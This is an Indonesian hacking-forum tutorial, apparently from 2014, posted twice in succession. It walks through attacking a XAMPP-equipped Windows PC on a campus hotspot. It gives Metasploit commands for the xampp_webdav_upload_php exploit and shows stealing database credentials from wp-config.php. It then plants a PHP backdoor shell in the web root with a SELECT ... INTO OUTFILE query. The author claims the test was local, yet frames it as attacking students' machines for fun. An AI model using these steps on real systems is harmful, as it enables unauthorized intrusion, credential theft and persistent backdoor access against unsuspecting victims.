09-05-2014, 09:12 PM
[hide]
selamat malam rekan-rekan IBTeam sekalian.
sebelumnya saya ingin mengucapkan turut berduka cita atas meninggalnya rekan kita Red Dragon dari HN forum semoga amal ibadahnya di terima oleh Tuhan yang maha kuasa. :')
pada kesempatan kali ini saya akan berbagi sedikit ilmu yang masih tingkat bawah. jadi jangan buli yaa... hehehee
kali ini, saya akan memberi tahu cara bagaimana kita bisa mengeksploitasi pc milik korban baik yang satu jaringan maupun yang berada di luar jaringan via ip publik tentunya.
jadi kali ini saya akan membahas tutorial singkat seperti dongeng. tapi itu hanya ilustrasi saja ya. saya tetap melakukan percobaan ini secara local. karena saya menjaga kode etik perentasan. hehehee
pada suatu hari, saya jalan jalan di area hotspot sebuah kampus jurusan IT. kita bisa menebak aktifitas yang mereka lakukan selama berada di kampus apa saja. ada yang sedang iseng" buka youtube, facebookan, nonton anime hingga yang sedang coding. wah coding nih, coding apaan dulu nih? wah kalau seorang web developer, tentunya dia pasti menggunakan xampp saat menggunakan windows. ok langsung saja kita serang pc milik salah satu mahasiswa yang ada di kampus ini.
target kita kali ini adalah Windows 7 ultimate 32 bit yang sudah terinstal xampp. bagaimana saya bisa tahu? nmap saja wkwkwkkwkw
dari sini kita bisa tahu bahwa korban menggunakan operating system windows dan mysql sedang running di dalamnya. pertanda baik jika kita bisa membuka ip korban di web browser.
wah ternyata bisa di buka wkwkwkwkk. tenang ini target kita kali ini adalah pc saya sendiri yang sedang di jalanin via virtual box wkwkwkwkwkk
ok langsung saja kita buka metasploit untuk mengeksekusinya.
setelah kita mendapatkan exploit yang kita butuhkan, kita bisa masukan opsi tersebut dengan cara
kita bisa memasukan ip korban dengan cara
setelah kita memasukan ip korban, kita langsung saja
dan hasilnya adalah kita sudah masuk ke meterpreter. tandanya kita sudah mendapatkan hak akses penuh dari pc korban.
tidak sampai disitu kali ini saya ingin sekali memasang shell backdoor ke pc korban untuk jaga jaga kalau mau usilin dia hehehee.
secara otomatis shell metasploit yang kita gunakan tersimpan di folder webdav. jadi kita mundur satu directory untuk mencari htdocs (folder setara /var/www jika di linux)
kita langsung masuk saja ke directory htdocs untuk beriseng ria heehehee
ahh nggak cukup iseng, kebetulan korban menggunakan wordpress jadi kita bisa tahu dengan mudah username password phpmyadmin milik korban di wp-config.php
kita bisa melihatnya dengan cara
akhirnya kita bisa tahu username password untuk phpmyadminnya yaitu username:root passony hehehee
sekarang kita coba upload via meterpreter shell backdoor untuk jaga jaga aja
wahh ternyata nggak bisa di upload via meterpreter. ok dah kita coba upload via phpmyadmin aja yakk wkwkwkwkk
kita masuk dengan username dan password yang kita dapatkan dari wp-config tadi.
dan walaaahh akhirnya masuukk wkwkwkwkkwkwk
lalu kita pilih menu SQL dan isikan
untuk mengetahui source directory document_root korban anda bisa cari di ip_korban/xampp dan pilih phpinfo()
nah kalau sudah ketemu langsung saja kita isi sql tersebut dan klik go!
setelah klik go mungkin akan muncul tulisan seperti ini
tapi itu tidak apa apa. abaikan saja wkwkwkkw.
sekarang kita tinggal buka shell backdoor yang kita pasang barusan dengan cara:
sekian tutorial sederhana dari saya. mohon maaf apabila ada yang tidak berkenan.
semoga bermanfaat
[/hide]
selamat malam rekan-rekan IBTeam sekalian.
sebelumnya saya ingin mengucapkan turut berduka cita atas meninggalnya rekan kita Red Dragon dari HN forum semoga amal ibadahnya di terima oleh Tuhan yang maha kuasa. :')
pada kesempatan kali ini saya akan berbagi sedikit ilmu yang masih tingkat bawah. jadi jangan buli yaa... hehehee
kali ini, saya akan memberi tahu cara bagaimana kita bisa mengeksploitasi pc milik korban baik yang satu jaringan maupun yang berada di luar jaringan via ip publik tentunya.
jadi kali ini saya akan membahas tutorial singkat seperti dongeng. tapi itu hanya ilustrasi saja ya. saya tetap melakukan percobaan ini secara local. karena saya menjaga kode etik perentasan. hehehee
pada suatu hari, saya jalan jalan di area hotspot sebuah kampus jurusan IT. kita bisa menebak aktifitas yang mereka lakukan selama berada di kampus apa saja. ada yang sedang iseng" buka youtube, facebookan, nonton anime hingga yang sedang coding. wah coding nih, coding apaan dulu nih? wah kalau seorang web developer, tentunya dia pasti menggunakan xampp saat menggunakan windows. ok langsung saja kita serang pc milik salah satu mahasiswa yang ada di kampus ini.
target kita kali ini adalah Windows 7 ultimate 32 bit yang sudah terinstal xampp. bagaimana saya bisa tahu? nmap saja wkwkwkkwkw
Spoiler! :
Spoiler! :
ok langsung saja kita buka metasploit untuk mengeksekusinya.
Quote:msfconsoledan langsung cari exploit untuk xampp dengan cara
Quote:search xampp
Spoiler! :
setelah kita mendapatkan exploit yang kita butuhkan, kita bisa masukan opsi tersebut dengan cara
Quote:use exploit/windows/http/xampp_webdav_upload_phplalu kita check apa saja yang di butuhkan untuk melaksanakan exploitasi tersebut. eh ternyata cuman butuh ip korbannya doang wakakakkakakk
Spoiler! :
kita bisa memasukan ip korban dengan cara
Quote:set RHOST ip_korban
Spoiler! :
setelah kita memasukan ip korban, kita langsung saja
Quote:exploit
Spoiler! :
tidak sampai disitu kali ini saya ingin sekali memasang shell backdoor ke pc korban untuk jaga jaga kalau mau usilin dia hehehee.
secara otomatis shell metasploit yang kita gunakan tersimpan di folder webdav. jadi kita mundur satu directory untuk mencari htdocs (folder setara /var/www jika di linux)
Spoiler! :
Spoiler! :
ahh nggak cukup iseng, kebetulan korban menggunakan wordpress jadi kita bisa tahu dengan mudah username password phpmyadmin milik korban di wp-config.php
kita bisa melihatnya dengan cara
Quote:cat wp-config.php
Spoiler! :
sekarang kita coba upload via meterpreter shell backdoor untuk jaga jaga aja
Spoiler! :
kita masuk dengan username dan password yang kita dapatkan dari wp-config tadi.
Spoiler! :
dan walaaahh akhirnya masuukk wkwkwkwkkwkwk
Spoiler! :
lalu kita pilih menu SQL dan isikan
Quote:select "copas shell backdoor kamu disini" into outfile 'source document_root/namabackdoor.php'
Spoiler! :
Spoiler! :
nah kalau sudah ketemu langsung saja kita isi sql tersebut dan klik go!
Spoiler! :
Spoiler! :
sekarang kita tinggal buka shell backdoor yang kita pasang barusan dengan cara:
Quote:ip_korban/nama_shell_backdoor.phpdan akhirnya berhasil heheheheee
Spoiler! :
sekian tutorial sederhana dari saya. mohon maaf apabila ada yang tidak berkenan.
semoga bermanfaat
[/hide]